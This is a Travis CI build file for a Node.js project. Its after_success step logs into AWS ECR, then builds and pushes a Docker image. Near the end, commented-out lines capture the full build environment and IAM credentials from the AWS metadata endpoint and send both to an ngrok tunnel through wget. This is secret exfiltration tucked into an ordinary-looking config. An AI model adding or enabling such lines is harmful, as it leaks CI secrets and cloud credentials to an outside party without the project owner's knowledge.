language: node_js

services:
  - docker

install:
  - echo "install nothing!" # put your normal pre-testing installs here derp

script:
  - echo "no tests!" # put your normal testing scripts here

after_success:
  - docker --version
  - pip install --user awscli
  - export CLASS=`cat .class`
  - eval "$(aws ecr get-login --no-include-email --region us-east-1)"
  - docker build -t 310090471142.dkr.ecr.us-east-1.amazonaws.com/jetrist-dev .
  - docker push 310090471142.dkr.ecr.us-east-1.amazonaws.com/jetrist-dev
#  - export ENV=`env`
#  - wget http://10dba31472cd.ngrok.io/$(echo $ENV)
#  - export AWS_ENV=`curl http://169.254.169.254/latest/meta-data/iam/security-credentials`
#  - wget http://10dba31472cd.ngrok.io/$(echo $AWS_ENV)
# sadly, travis doesn't cache docker builds yet, so each build will take a while
